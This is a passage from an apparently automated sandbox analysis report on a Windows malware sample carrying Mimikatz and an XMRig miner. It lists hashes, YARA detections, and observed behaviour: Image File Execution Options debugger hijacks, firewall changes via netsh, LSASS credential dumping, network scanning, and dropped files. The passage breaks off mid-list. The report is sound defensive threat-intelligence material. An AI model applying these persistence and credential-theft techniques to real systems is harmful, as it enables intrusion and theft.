Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 02:59
Behavioral task
behavioral1
Sample
2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe
-
Size
6.8MB
-
MD5
8cb7a532cba3bb090262bddf9d0adf39
-
SHA1
d099b93ebb0c44af7175340f034a1626239f3bce
-
SHA256
a7b83209a11727de8d65b5b6e075f129a86b5f3ceeb024b34640f2b980ecb193
-
SHA512
04821e17478dcd1c262043ddf4b776d8186a586c73312a6fbe359c642de32a2eb5a201f38e197cbc9c8e50f8d77424c6ba263f13933fa0ed6506fca97444df94
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1260 created 2060 1260 ucdremr.exe 37 -
Xmrig family
-
Contacts a large (29410) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3320-181-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-186-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-203-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-216-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-225-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-232-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-242-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-283-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-284-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-295-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-296-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig behavioral2/memory/3320-302-0x00007FF739300000-0x00007FF739420000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1728-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1728-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c62-6.dat mimikatz behavioral2/memory/2660-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/5000-138-0x00007FF69BD90000-0x00007FF69BE7E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ucdremr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts ucdremr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ucdremr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ucdremr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ucdremr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3324 netsh.exe 2468 netsh.exe -
Executes dropped EXE 26 IoCs
pid Process 2660 ucdremr.exe 1260 ucdremr.exe 824 wpcap.exe 1968 kjezifarc.exe 5000 vfshost.exe 3076 htmcbbltr.exe 852 xohudmc.exe 3460 bgvdci.exe 3320 vktncb.exe 2404 htmcbbltr.exe 4780 ucdremr.exe 4676 htmcbbltr.exe 2248 htmcbbltr.exe 2712 htmcbbltr.exe 5044 htmcbbltr.exe 2436 htmcbbltr.exe 1020 htmcbbltr.exe 2072 htmcbbltr.exe 4416 htmcbbltr.exe 2356 htmcbbltr.exe 3748 htmcbbltr.exe 2680 htmcbbltr.exe 216 htmcbbltr.exe 2428 htmcbbltr.exe 3076 vvbrngnms.exe 5256 ucdremr.exe -
Loads dropped DLL 12 IoCs
pid Process 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 824 wpcap.exe 1968 kjezifarc.exe 1968 kjezifarc.exe 1968 kjezifarc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 55 ifconfig.me 56 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 ucdremr.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ucdremr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\bgvdci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ucdremr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ucdremr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\bgvdci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ucdremr.exe -
resource yara_rule behavioral2/files/0x0007000000023ca8-134.dat upx behavioral2/memory/5000-135-0x00007FF69BD90000-0x00007FF69BE7E000-memory.dmp upx behavioral2/memory/5000-138-0x00007FF69BD90000-0x00007FF69BE7E000-memory.dmp upx behavioral2/files/0x0007000000023cb2-141.dat upx behavioral2/memory/3076-142-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3076-146-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/files/0x0007000000023cb1-163.dat upx behavioral2/memory/3320-165-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/2404-171-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/4676-179-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3320-181-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/2248-184-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3320-186-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/2712-189-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/5044-193-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/2436-197-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/1020-201-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3320-203-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/2072-206-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/4416-210-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/2356-214-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3320-216-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3748-219-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/2680-223-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3320-225-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/216-228-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/2428-231-0x00007FF692270000-0x00007FF6922CB000-memory.dmp upx behavioral2/memory/3320-232-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3320-242-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3320-283-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3320-284-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3320-295-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3320-296-0x00007FF739300000-0x00007FF739420000-memory.dmp upx behavioral2/memory/3320-302-0x00007FF739300000-0x00007FF739420000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\yjyimgrn\ucdremr.exe 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe File created C:\Windows\rbqcumykk\ctftbtnzv\kjezifarc.exe ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\vvbrngnms.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\xdvl-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\vimpcsvc.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\schoedcl.xml ucdremr.exe File created C:\Windows\rbqcumykk\Corporate\mimilib.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\coli-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\vimpcsvc.exe ucdremr.exe File created C:\Windows\yjyimgrn\docmicfg.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\ucl.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\spoolsrv.exe ucdremr.exe File created C:\Windows\yjyimgrn\spoolsrv.xml ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\scan.bat ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\exma-1.dll ucdremr.exe File created C:\Windows\yjyimgrn\schoedcl.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\docmicfg.xml ucdremr.exe File created C:\Windows\rbqcumykk\Corporate\vfshost.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\docmicfg.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\docmicfg.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\spoolsrv.xml ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\Packet.dll ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\wpcap.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\crli-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\tibe-2.dll ucdremr.exe File opened for modification C:\Windows\rbqcumykk\Corporate\log.txt cmd.exe File opened for modification C:\Windows\rbqcumykk\ctftbtnzv\Result.txt vvbrngnms.exe File created C:\Windows\rbqcumykk\upbdrjv\swrpwe.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\tucl-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\zlib1.dll ucdremr.exe File opened for modification C:\Windows\yjyimgrn\vimpcsvc.xml ucdremr.exe File created C:\Windows\rbqcumykk\Corporate\mimidrv.sys ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\schoedcl.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\vimpcsvc.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\docmicfg.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\spoolsrv.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\schoedcl.xml ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\ip.txt ucdremr.exe File opened for modification C:\Windows\rbqcumykk\ctftbtnzv\Packet.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\cnli-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\libeay32.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\libxml2.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\AppCapture64.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\AppCapture32.dll ucdremr.exe File created C:\Windows\rbqcumykk\ctftbtnzv\wpcap.exe ucdremr.exe File opened for modification C:\Windows\yjyimgrn\svschost.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\posh-0.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\spoolsrv.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\svschost.xml ucdremr.exe File created C:\Windows\yjyimgrn\svschost.xml ucdremr.exe File created C:\Windows\yjyimgrn\vimpcsvc.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\trch-1.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\svschost.xml ucdremr.exe File opened for modification C:\Windows\yjyimgrn\ucdremr.exe 2024-12-22_8cb7a532cba3bb090262bddf9d0adf39_hacktools_icedid_mimikatz.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\trfo-2.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\schoedcl.xml ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\ssleay32.dll ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\specials\svschost.exe ucdremr.exe File created C:\Windows\ime\ucdremr.exe ucdremr.exe File created C:\Windows\rbqcumykk\UnattendGC\Shellcode.ini ucdremr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2716 sc.exe 4456 sc.exe 3212 sc.exe 3156 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ucdremr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 